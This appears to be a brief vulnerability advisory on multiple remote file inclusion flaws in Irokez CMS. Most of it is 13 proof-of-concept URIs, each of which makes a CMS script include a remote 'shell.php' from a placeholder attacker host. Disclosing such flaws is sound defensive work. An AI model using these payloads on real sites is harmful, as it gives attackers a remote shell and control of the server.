Irokez CMS Multiple Remote File Include Vulnerabilities

Irokez CMS Multiple Remote File Include Vulnerabilities

Attackers can exploit these issues using a web client.

The following proof-of-concept URIs are available:

http://www.example.com/[path]/scripts/gallery.scr.php?GLOBALS[PTH][func]=http://www.example2.com/shell.php?
http://www.example.com/[path]/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=http://www.example2.com/shell.php?
http://www.example.com/[path]/scripts/news.scr.php?GLOBALS[PTH][classes]=http://www.example2.com/shell.php?
http://www.example.com/[path]/scripts/polls.scr.php?GLOBALS[PTH][classes]=http://www.example2.com/shell.php?
http://www.example.com/[path]/scripts/rss.scr.php?GLOBALS[PTH][classes]=http://www.example2.com/shell.php?
http://www.example.com/[path]/scripts/search.scr.php?GLOBALS[PTH][classes]=http://www.example2.com/shell.php?
http://www.example.com/[path]/scripts/xtextarea.scr.php?GLOBALS[PTH][spaw]=http://www.example2.com/shell.php?
http://www.example.com/[path]/functions/form.func.php?GLOBALS[PTH][classes]=http://www.example2.com/shell.php?
http://www.example.com/[path]/functions/general.func.php?GLOBALS[PTH][classes]=http://www.example2.com/shell.php?
http://www.example.com/[path]/functions/groups.func.php?GLOBALS[PTH][classes]=http://www.example2.com/shell.php?
http://www.example.com/[path]/functions/js.func.php?GLOBALS[PTH][classes]=http://www.example2.com/shell.php?
http://www.example.com/[path]/functions/sections.func.php?GLOBALS[PTH][classes]=http://www.example2.com/shell.php?
http://www.example.com/[path]/functions/users.func.php?GLOBALS[PTH][classes]=http://www.example2.com/shell.php?